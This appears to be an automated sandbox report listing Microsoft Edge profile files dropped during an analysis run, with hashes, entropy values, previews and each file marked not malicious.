                                                                                                                                                                                                                                                                                    Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):342
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.160286870229116
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERdKVoyq2P923oH+TcwtfrzAdIFUt8VRdQ1Zmw+VRdGRkwO923oH+TcwtfrzILJ:5iyv4Yeb9FUt8o/+oR5LYeb2J
                                                                                                                                                                                                                                                                                    MD5:EA2E065A6EFD34282DCB653EA57CFEE2
                                                                                                                                                                                                                                                                                    SHA1:5679D460AAB002F37848297EE4E5524C6D110022
                                                                                                                                                                                                                                                                                    SHA-256:7BB6EB930A247F77DE564A9C87CA30A8AAA3D6568745743FAF65235CCD357329
                                                                                                                                                                                                                                                                                    SHA-512:DE2E7868377E8E566BBCDBE9051B653A4EE5FDE8B3F90013F5F048F6A8ACE26D71CFC31938EFB0316466237EC724C7AF04134E7BC69C846EA08734A435626003
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:48.442 10a0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/23-00:57:48.443 10a0 Recovering log #3.2024/12/23-00:57:48.443 10a0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):342
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.160286870229116
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERdKVoyq2P923oH+TcwtfrzAdIFUt8VRdQ1Zmw+VRdGRkwO923oH+TcwtfrzILJ:5iyv4Yeb9FUt8o/+oR5LYeb2J
                                                                                                                                                                                                                                                                                    MD5:EA2E065A6EFD34282DCB653EA57CFEE2
                                                                                                                                                                                                                                                                                    SHA1:5679D460AAB002F37848297EE4E5524C6D110022
                                                                                                                                                                                                                                                                                    SHA-256:7BB6EB930A247F77DE564A9C87CA30A8AAA3D6568745743FAF65235CCD357329
                                                                                                                                                                                                                                                                                    SHA-512:DE2E7868377E8E566BBCDBE9051B653A4EE5FDE8B3F90013F5F048F6A8ACE26D71CFC31938EFB0316466237EC724C7AF04134E7BC69C846EA08734A435626003
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:48.442 10a0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/23-00:57:48.443 10a0 Recovering log #3.2024/12/23-00:57:48.443 10a0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):120
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                    MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                    SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                    SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                    SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):13
                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                    MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                    SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                    SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                    SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:117.0.2045.47

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090741681997585
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+mtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEx6Ltbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:A23AFFFB2AD172F8A25DFBB6C88DEBE5
                                                                                                                                                                                                                                                                                    SHA1:1E6011053C61C791E9D7A02A0388E721DE1976C8
                                                                                                                                                                                                                                                                                    SHA-256:5DD06868735CEAB9CD4F0BB65D7B6758B03B186C523E0C97FCE07720846B5433
                                                                                                                                                                                                                                                                                    SHA-512:427E889ED37A9F26B422346AA275D8E735F74EC8F1DB321DCA0B9A8E137F0649284D974B2969C7F47706A49721357EC03CB94C66752A833B943C4990355D87AB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF39694.TMP (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090741681997585
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+mtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEx6Ltbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:A23AFFFB2AD172F8A25DFBB6C88DEBE5
                                                                                                                                                                                                                                                                                    SHA1:1E6011053C61C791E9D7A02A0388E721DE1976C8
                                                                                                                                                                                                                                                                                    SHA-256:5DD06868735CEAB9CD4F0BB65D7B6758B03B186C523E0C97FCE07720846B5433
                                                                                                                                                                                                                                                                                    SHA-512:427E889ED37A9F26B422346AA275D8E735F74EC8F1DB321DCA0B9A8E137F0649284D974B2969C7F47706A49721357EC03CB94C66752A833B943C4990355D87AB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF396c3.TMP (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090741681997585
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+mtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEx6Ltbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:A23AFFFB2AD172F8A25DFBB6C88DEBE5
                                                                                                                                                                                                                                                                                    SHA1:1E6011053C61C791E9D7A02A0388E721DE1976C8
                                                                                                                                                                                                                                                                                    SHA-256:5DD06868735CEAB9CD4F0BB65D7B6758B03B186C523E0C97FCE07720846B5433
                                                                                                                                                                                                                                                                                    SHA-512:427E889ED37A9F26B422346AA275D8E735F74EC8F1DB321DCA0B9A8E137F0649284D974B2969C7F47706A49721357EC03CB94C66752A833B943C4990355D87AB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF39a8b.TMP (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090741681997585
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+mtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEx6Ltbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:A23AFFFB2AD172F8A25DFBB6C88DEBE5
                                                                                                                                                                                                                                                                                    SHA1:1E6011053C61C791E9D7A02A0388E721DE1976C8
                                                                                                                                                                                                                                                                                    SHA-256:5DD06868735CEAB9CD4F0BB65D7B6758B03B186C523E0C97FCE07720846B5433
                                                                                                                                                                                                                                                                                    SHA-512:427E889ED37A9F26B422346AA275D8E735F74EC8F1DB321DCA0B9A8E137F0649284D974B2969C7F47706A49721357EC03CB94C66752A833B943C4990355D87AB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3c16d.TMP (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090741681997585
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+mtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEx6Ltbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:A23AFFFB2AD172F8A25DFBB6C88DEBE5
                                                                                                                                                                                                                                                                                    SHA1:1E6011053C61C791E9D7A02A0388E721DE1976C8
                                                                                                                                                                                                                                                                                    SHA-256:5DD06868735CEAB9CD4F0BB65D7B6758B03B186C523E0C97FCE07720846B5433
                                                                                                                                                                                                                                                                                    SHA-512:427E889ED37A9F26B422346AA275D8E735F74EC8F1DB321DCA0B9A8E137F0649284D974B2969C7F47706A49721357EC03CB94C66752A833B943C4990355D87AB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3fe27.TMP (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090741681997585
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+mtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEx6Ltbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:A23AFFFB2AD172F8A25DFBB6C88DEBE5
                                                                                                                                                                                                                                                                                    SHA1:1E6011053C61C791E9D7A02A0388E721DE1976C8
                                                                                                                                                                                                                                                                                    SHA-256:5DD06868735CEAB9CD4F0BB65D7B6758B03B186C523E0C97FCE07720846B5433
                                                                                                                                                                                                                                                                                    SHA-512:427E889ED37A9F26B422346AA275D8E735F74EC8F1DB321DCA0B9A8E137F0649284D974B2969C7F47706A49721357EC03CB94C66752A833B943C4990355D87AB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4aa46.TMP (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090741681997585
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+mtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEx6Ltbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:A23AFFFB2AD172F8A25DFBB6C88DEBE5
                                                                                                                                                                                                                                                                                    SHA1:1E6011053C61C791E9D7A02A0388E721DE1976C8
                                                                                                                                                                                                                                                                                    SHA-256:5DD06868735CEAB9CD4F0BB65D7B6758B03B186C523E0C97FCE07720846B5433
                                                                                                                                                                                                                                                                                    SHA-512:427E889ED37A9F26B422346AA275D8E735F74EC8F1DB321DCA0B9A8E137F0649284D974B2969C7F47706A49721357EC03CB94C66752A833B943C4990355D87AB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                    MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                    SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                    SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
